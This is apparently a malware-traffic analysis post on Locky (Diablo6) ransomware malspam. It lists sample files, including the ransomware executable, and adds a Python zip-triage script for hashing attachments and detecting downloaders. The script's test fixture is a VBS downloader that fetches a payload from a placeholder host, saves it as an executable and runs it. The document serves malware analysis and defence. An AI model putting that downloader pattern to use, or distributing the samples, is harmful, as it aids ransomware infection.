2017-08-09 - MALWARE & TRAFFIC FROM MALSPAM PUSHING DIABLO6 VARIANT OF LOCKY

ASSOCIATED FILES:

  • 2017-08-09-Locky-malspam-traffic.pcap   (556,954 bytes)
  • 2017-08-09-Locky-decryption-instructions-diablo6.bmp   (5,666,614 bytes)
  • 2017-08-09-Locky-decryption-instructions-diablo6.htm   (8,913 bytes)
  • 2017-08-09-Locky-executable.exe   (620,544 bytes)
  • 2017-08-09 (263).vbs   (5,892 bytes)
  • 2017-08-09 (780).zip   (2,125 bytes)

NOTES:

A BLOG POST AND SOME TWEETS ABOUT THIS:

EMAILS


Shown above:  An example of what the emails looked like.

Shown above:  The zip archive attachment and extracted VBS file.

TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.

ASSOCIATED DOMAINS:

FILE HASHES

ZIP ARCHIVE FROM THE EMAIL:

EXTRACTED .VBS FILE:

LOCKY EXECUTABLE RETRIEVED FROM THE INFECTED HOST:
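As an added example (not code from the original post), here is a small Python triage routine of the kind used to build the artifact inventory above: it opens a malspam zip attachment in memory, records the SHA-256 of the archive and of every member the way the FILE HASHES section does, and flags Windows Script Host members (.vbs, .js, .wsf and similar) that show the fetch-then-write-then-execute pattern of a downloader. The function names (triage_zip, analyze_script, sha256_hex, summarize), the indicator regexes, and the embedded fixture (an inert VBS text that names the reserved host example.invalid, packed as invoice.vbs) are all constructed for this example; none of it is the sample from this post, and the script text is only pattern-matched, never run.

```python
"""Triage a malspam zip attachment: hash the archive and each member, then flag
script members that look like Windows Script Host downloaders.

Added example for this page, not code from the original post. The fixture
below is constructed here and is NOT the sample referenced in the post."""
import hashlib
import io
import re
import zipfile
from typing import Optional

# Attachment types that run under Windows Script Host / mshta (assumed triage list).
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta"}

# Indicators of the fetch -> write -> execute pattern of a script downloader
# (assumed patterns for illustration; tune them against real samples).
DOWNLOADER_PATTERNS = {
    "http_object": re.compile(
        r'CreateObject\(\s*"(?:MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest)', re.I),
    "file_write": re.compile(r'CreateObject\(\s*"ADODB\.Stream"', re.I),
    "exec": re.compile(r'CreateObject\(\s*"WScript\.Shell"|\.(?:Run|Exec)\b', re.I),
    "url": re.compile(r'https?://[^\s"\'<>]+', re.I),
}


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256, the form used in the FILE HASHES section of a post like this."""
    return hashlib.sha256(data).hexdigest()


def analyze_script(text: str) -> dict:
    """Report which downloader indicators a script contains and the URLs it names."""
    hits = {name: bool(pat.search(text)) for name, pat in DOWNLOADER_PATTERNS.items()}
    urls = DOWNLOADER_PATTERNS["url"].findall(text)
    # A downloader needs all three stages; a URL alone is not enough to call it one.
    downloader = hits["http_object"] and hits["file_write"] and hits["exec"]
    return {"indicators": hits, "urls": urls, "downloader": downloader}


def triage_zip(zip_bytes: bytes, password: Optional[bytes] = None) -> dict:
    """Hash the archive and every member; analyze members with a script extension."""
    report = {"archive_sha256": sha256_hex(zip_bytes), "members": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info, pwd=password)
            name = info.filename
            ext = name[name.rfind("."):].lower() if "." in name else ""
            entry = {"name": name, "size": len(data),
                     "sha256": sha256_hex(data), "script": None}
            if ext in SCRIPT_EXTENSIONS:
                # WSH scripts are text; latin-1 decodes any byte sequence without error.
                entry["script"] = analyze_script(data.decode("latin-1"))
            report["members"].append(entry)
    return report


# Constructed fixture: an inert stand-in for a VBS downloader. It is only
# pattern-matched, never executed, and example.invalid can never resolve.
SAMPLE_VBS = (
    'Set http = CreateObject("MSXML2.XMLHTTP")\r\n'
    'http.Open "GET", "http://example.invalid/stage2", False\r\n'
    'http.Send\r\n'
    'Set strm = CreateObject("ADODB.Stream")\r\n'
    'strm.Open\r\n'
    'strm.Type = 1\r\n'
    'strm.Write http.ResponseBody\r\n'
    'strm.SaveToFile "dropped.exe", 2\r\n'
    'CreateObject("WScript.Shell").Run "dropped.exe"\r\n'
)


def build_sample_zip() -> bytes:
    """Build an in-memory zip shaped like a malspam attachment (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in (("invoice.vbs", SAMPLE_VBS), ("readme.txt", "plain text\n")):
            zi = zipfile.ZipInfo(name, date_time=(2017, 8, 9, 0, 0, 0))  # fixed, so hashes repeat
            zi.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(zi, payload)
    return buf.getvalue()


def summarize(report: dict) -> list:
    """One line per artifact, in the order a triage note would list them."""
    lines = [f"archive  sha256 {report['archive_sha256']}"]
    for m in report["members"]:
        verdict = "not a script"
        if m["script"] is not None:
            verdict = "DOWNLOADER" if m["script"]["downloader"] else "script, no downloader pattern"
        lines.append(f"{m['name']}  {m['size']} bytes  sha256 {m['sha256']}  {verdict}")
    return lines


if __name__ == "__main__":
    for line in summarize(triage_zip(build_sample_zip())):
        print(line)
```

Running it prints one line per artifact with its size, SHA-256 and verdict. The password argument is there because samples shared for analysis (including the ones on this site) are usually wrapped in a password-protected zip; the standard-library zipfile module only decrypts the legacy ZipCrypto scheme, so an AES-encrypted archive has to be unpacked with 7-Zip or the pyzipper package first.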

SCREENSHOTS


Shown above:  Screenshot from a Windows host infected with this Diablo6 variant of Locky.

Shown above:  Examples of encrypted files.

Shown above:  Locky decryptor page from the Tor domain.

Shown above:  The ransom demanded was 0.5 bitcoin.

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
